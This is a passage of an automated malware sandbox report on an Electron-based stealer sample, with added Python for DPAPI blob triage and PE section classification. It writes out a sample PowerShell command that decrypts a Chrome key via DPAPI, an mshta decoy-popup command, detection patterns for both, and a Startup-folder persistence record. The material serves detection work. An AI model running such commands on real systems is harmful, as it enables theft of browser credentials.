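# Provider GUID found in every user-mode DPAPI blob, {df9d8cd0-1501-11d1-8c7a-00c04fc297eb};
# on the wire it is the little-endian run d0 8c 9d df 01 15 d1 11 8c 7a 00 c0 4f c2 97 eb.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# Blob descriptions decoded from the two Unprotect calls in the report; extend per browser.
BROWSER_KEY_DESCRIPTIONS = {"Google Chrome", "Microsoft Edge"}

UNPROTECT_RE = re.compile(r"ProtectedData\]::Unprotect\s*\(", re.IGNORECASE)
BYTE_ARRAY_RE = re.compile(r"\[byte\[\]\]\s*@\(\s*([0-9,\s]+?)\s*\)")
NO_ENTROPY_RE = re.compile(r"\$null\s*,\s*['\"]CurrentUser['\"]\s*\)", re.IGNORECASE)
MSHTA_INLINE_RE = re.compile(r"\bmshta(?:\.exe)?\s+\"?(?:javascript|vbscript):", re.IGNORECASE)


def parse_dpapi_header(blob: bytes) -> dict:
    """Parse the leading fields of a CRYPTPROTECT blob.

    Layout, all little-endian: u32 version (1) | GUID provider | u32 master-key
    version | GUID master key | u32 flags | u32 description length | UTF-16LE
    NUL-terminated description | cipher/hash ids, salt, HMAC keys, data, MAC.
    Only the fields up to the description are needed for triage.
    """
    if len(blob) < 48:
        raise ValueError("too short for a DPAPI blob")
    version, = struct.unpack_from("<I", blob, 0)
    provider = uuid.UUID(bytes_le=blob[4:20])
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("version or provider GUID is not DPAPI")
    master_key = uuid.UUID(bytes_le=blob[24:40])
    flags, desc_len = struct.unpack_from("<II", blob, 40)
    if len(blob) < 48 + desc_len:
        raise ValueError("description length exceeds blob")
    description = blob[48:48 + desc_len].decode("utf-16-le", "replace").rstrip("\x00")
    # The master-key GUID names the file under %APPDATA%\Microsoft\Protect\<SID>\ that
    # an offline decryption (user password or domain backup key) would need.
    return {"master_key_guid": str(master_key), "flags": flags, "description": description}


def build_dpapi_blob(description: str, master_key_guid: str, flags: int = 0x10) -> bytes:
    """Constructed fixture: a DPAPI blob header with the trailing key material
    and ciphertext zeroed. Enough for the parser; useless for decryption."""
    desc = (description + "\x00").encode("utf-16-le")
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + uuid.UUID(master_key_guid).bytes_le
            + struct.pack("<II", flags, len(desc)) + desc
            + bytes(32))  # stand-in for algorithm ids, salt, HMAC key, data and MAC


def triage_cmdline(cmdline: str) -> list:
    """Return findings for one process-creation command line (empty if nothing matched)."""
    findings = []
    if UNPROTECT_RE.search(cmdline):
        m = BYTE_ARRAY_RE.search(cmdline)
        if m is None:
            findings.append("DPAPI Unprotect call without an inline blob")
        else:
            try:
                blob = bytes(int(b) for b in re.split(r"[,\s]+", m.group(1)) if b)
                hdr = parse_dpapi_header(blob)
            except ValueError as exc:
                findings.append(f"DPAPI Unprotect on bytes that are not a DPAPI blob ({exc})")
            else:
                what = ("browser os_crypt key" if hdr["description"] in BROWSER_KEY_DESCRIPTIONS
                        else "DPAPI blob")
                scope = ", no entropy, CurrentUser scope" if NO_ENTROPY_RE.search(cmdline) else ""
                findings.append(f"DPAPI Unprotect of {what} described as '{hdr['description']}' "
                                f"(master key {hdr['master_key_guid']}{scope})")
    if MSHTA_INLINE_RE.search(cmdline):
        findings.append("mshta launched with an inline script URI (decoy dialog / LOLBin)")
    return findings


if __name__ == "__main__":
    # Constructed sample in the shape of the report's command line; the master-key GUID
    # is the one decoded from the report's blob, the rest of the blob is fixture data.
    blob = build_dpapi_blob("Google Chrome", "1f96f985-85d7-4a7a-a053-c8e755c25d39")
    sample = ("powershell.exe Add-Type -AssemblyName System.Security; "
              "[System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@("
              + ",".join(map(str, blob)) + "), $null, 'CurrentUser')")
    decoy = ('cmd /c mshta "javascript:new ActiveXObject(\'WScript.Shell\')'
             '.Popup(\'An error occurred\', 0, \'Error\', 16);close()"')
    for line in (sample, decoy, 'cmd.exe /d /s /c "tasklist"'):
        print(triage_cmdline(line) or ["no finding"])
```

For a detection rule, key on the parent chain rather than the string alone: a non-browser process spawning cmd.exe, which spawns powershell.exe with ProtectedData]::Unprotect and a literal [byte[]] whose description decodes to a browser name. Legitimate software has no reason to pass a DPAPI blob on a command line, so the false-positive rate of the parsed form is far lower than that of a plain match on Unprotect.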
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static file information: File size 69193668 > 1048576
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.0.dr
Source: Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: libGLESv2.dll.0.dr
Source: ffmpeg.dll.0.dr Static PE information: section name: .00cfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr Static PE information: section name: .voltbl
Source: ffmpeg.dll.0.dr Static PE information: section name: _RDATA
Source: libEGL.dll.0.dr Static PE information: section name: .00cfg
Source: libEGL.dll.0.dr Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr Static PE information: section name: .retplne
Source: libEGL.dll.0.dr Static PE information: section name: .voltbl
Source: libEGL.dll.0.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll.0.dr Static PE information: section name: .00cfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr Static PE information: section name: .voltbl
Source: libGLESv2.dll.0.dr Static PE information: section name: _RDATA
Source: Setup.exe.0.dr Static PE information: section name: .00cfg
Source: Setup.exe.0.dr Static PE information: section name: .gxfg
Source: Setup.exe.0.dr Static PE information: section name: .retplne
Source: Setup.exe.0.dr Static PE information: section name: .rodata
Source: Setup.exe.0.dr Static PE information: section name: .voltbl
Source: Setup.exe.0.dr Static PE information: section name: CPADinfo
Source: Setup.exe.0.dr Static PE information: section name: LZMADEC
Source: Setup.exe.0.dr Static PE information: section name: _RDATA
Source: Setup.exe.0.dr Static PE information: section name: malloc_h
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .voltbl
Source: vk_swiftshader.dll.0.dr Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr Static PE information: section name: .00cfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr Static PE information: section name: .voltbl
Source: vulkan-1.dll.0.dr Static PE information: section name: _RDATA
Source: ffmpeg.dll0.0.dr Static PE information: section name: .00cfg
Source: ffmpeg.dll0.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll0.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll0.0.dr Static PE information: section name: .voltbl
Source: ffmpeg.dll0.0.dr Static PE information: section name: _RDATA
Source: libEGL.dll0.0.dr Static PE information: section name: .00cfg
Source: libEGL.dll0.0.dr Static PE information: section name: .gxfg
Source: libEGL.dll0.0.dr Static PE information: section name: .retplne
Source: libEGL.dll0.0.dr Static PE information: section name: .voltbl
Source: libEGL.dll0.0.dr Static PE information: section name: _RDATA
Source: libGLESv2.dll0.0.dr Static PE information: section name: .00cfg
Source: libGLESv2.dll0.0.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll0.0.dr Static PE information: section name: .retplne
Source: libGLESv2.dll0.0.dr Static PE information: section name: .voltbl
Source: libGLESv2.dll0.0.dr Static PE information: section name: _RDATA
Source: Setup.exe0.0.dr Static PE information: section name: .00cfg
Source: Setup.exe0.0.dr Static PE information: section name: .gxfg
Source: Setup.exe0.0.dr Static PE information: section name: .retplne
Source: Setup.exe0.0.dr Static PE information: section name: .rodata
Source: Setup.exe0.0.dr Static PE information: section name: .voltbl
Source: Setup.exe0.0.dr Static PE information: section name: CPADinfo
Source: Setup.exe0.0.dr Static PE information: section name: LZMADEC
Source: Setup.exe0.0.dr Static PE information: section name: _RDATA
Source: Setup.exe0.0.dr Static PE information: section name: malloc_h
Source: Setup.exe.3.dr Static PE information: section name: .00cfg
Source: Setup.exe.3.dr Static PE information: section name: .gxfg
Source: Setup.exe.3.dr Static PE information: section name: .retplne
Source: Setup.exe.3.dr Static PE information: section name: .rodata
Source: Setup.exe.3.dr Static PE information: section name: .voltbl
Source: Setup.exe.3.dr Static PE information: section name: CPADinfo
Source: Setup.exe.3.dr Static PE information: section name: LZMADEC
Source: Setup.exe.3.dr Static PE information: section name: _RDATA
Source: Setup.exe.3.dr Static PE information: section name: malloc_h
Source: 899eff3c-e123-418b-b66d-58d51de99fbd.tmp.node.3.dr Static PE information: section name: _RDATA
Source: 075aadb5-2846-420f-98d8-32c9141ac90f.tmp.node.3.dr Static PE information: section name: _RDATA
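The section names flagged above recur on every dropped component (ffmpeg.dll, libEGL.dll, libGLESv2.dll, vk_swiftshader.dll, vulkan-1.dll, Setup.exe), and the dropped-file list carries LICENSE.electron.txt and resources\elevate.exe next to nsis7z.dll, System.dll and a 7z-out directory, so Setup.exe is an Electron runtime unpacked by an NSIS installer. .00cfg (Control Flow Guard), .gxfg (eXtended Flow Guard), .retplne (retpoline marker) and .voltbl (volatile metadata) are emitted by the MSVC/LLVM toolchain Chromium is built with, and CPADinfo is Crashpad's client-info block; none of them indicates a packer. For this family the "non-standard section names" signature is therefore a weak signal, and the useful question is whether any section is present that the stock Electron components do not have.

The Python below is an added example, not part of the sandbox report. It parses a PE section table with the standard library and separates standard sections, the Electron names listed above, and anything unexplained. The PE image it runs on is a constructed fixture (DOS header, PE signature, COFF header and section headers only), and the two name sets are assumptions drawn from this report, not an authoritative allowlist.

```python
"""Section-name triage for the Electron components dropped by this sample.

Added example; not part of the sandbox report. Parses the PE section table with
the standard library and splits the names into standard MSVC sections, names that
the report shows on the Electron/Chromium components, and anything left over that
actually deserves a look (packer sections, for instance). The PE image used below
is a constructed fixture with no code in it.
"""
import struct

# Names observed on the dropped ffmpeg.dll, libEGL.dll, libGLESv2.dll, vk_swiftshader.dll,
# vulkan-1.dll and Setup.exe above. The first four are MSVC/LLVM link-time features:
# .00cfg (Control Flow Guard), .gxfg (eXtended Flow Guard), .retplne (retpoline marker),
# .voltbl (volatile metadata); CPADinfo is the Crashpad client-info block. The rest are
# listed for the Electron main executable in this report and kept as observed.
ELECTRON_TOOLCHAIN_SECTIONS = {
    ".00cfg", ".gxfg", ".retplne", ".voltbl", "_RDATA",
    "CPADinfo", "LZMADEC", "malloc_h", ".rodata",
}
STANDARD_SECTIONS = {
    ".text", ".rdata", ".data", ".pdata", ".idata", ".edata",
    ".rsrc", ".reloc", ".tls", ".bss", ".CRT", ".didat",
}


def pe_section_names(image: bytes) -> list:
    """Return the section names from a PE image's section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + 20 + opt_size
    names = []
    for i in range(nsections):
        raw = image[table + i * 40: table + i * 40 + 8]  # IMAGE_SECTION_HEADER.Name
        if len(raw) < 8:
            raise ValueError("truncated section table")
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def classify_sections(names) -> dict:
    """Split section names into standard, Electron-toolchain, and unexplained."""
    known = STANDARD_SECTIONS | ELECTRON_TOOLCHAIN_SECTIONS
    return {
        "standard": [n for n in names if n in STANDARD_SECTIONS],
        "electron_toolchain": [n for n in names if n in ELECTRON_TOOLCHAIN_SECTIONS],
        "unexplained": [n for n in names if n not in known],
    }


def build_minimal_pe(section_names) -> bytes:
    """Constructed fixture: DOS header, PE signature, COFF header and section
    headers only. No optional header, no code, not loadable."""
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", e_lfanew)  # 64 bytes, e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, 0, 0x22)
    headers = b"".join(n.encode("ascii").ljust(8, b"\0") + bytes(32) for n in section_names)
    return dos + b"PE\0\0" + coff + headers


if __name__ == "__main__":
    # The names flagged for Setup.exe above, plus ordinary sections and one
    # packer-style name that the classification should single out.
    image = build_minimal_pe([".text", ".rdata", ".data", ".00cfg", ".gxfg", ".retplne",
                              ".rodata", ".voltbl", "CPADinfo", "LZMADEC", "_RDATA",
                              "malloc_h", ".rsrc", ".reloc", "UPX1"])
    print(classify_sections(pe_section_names(image)))
```

Run against the real dropped files, an empty "unexplained" list means the section layout is what the Electron toolchain produces and the analyst's time is better spent on the app.asar contents and the process tree than on the PE headers.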
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FF846B83588 push ebp; ret 18_2_00007FF846B835B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FF846B800BD pushad ; iretd 18_2_00007FF846B800C1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\nsis7z.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Local\Temp\899eff3c-e123-418b-b66d-58d51de99fbd.tmp.node Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Local\Temp\075aadb5-2846-420f-98d8-32c9141ac90f.tmp.node Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\ffmpeg.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\vk_swiftshader.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\Setup.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\ffmpeg.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\resources\elevate.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\vulkan-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\LICENSE.electron.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\LICENSE.electron.txt Jump to behavior

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3664
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2538
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2995
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1700
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\nsis7z.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\System.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskDB69.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\libGLESv2.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\899eff3c-e123-418b-b66d-58d51de99fbd.tmp.node
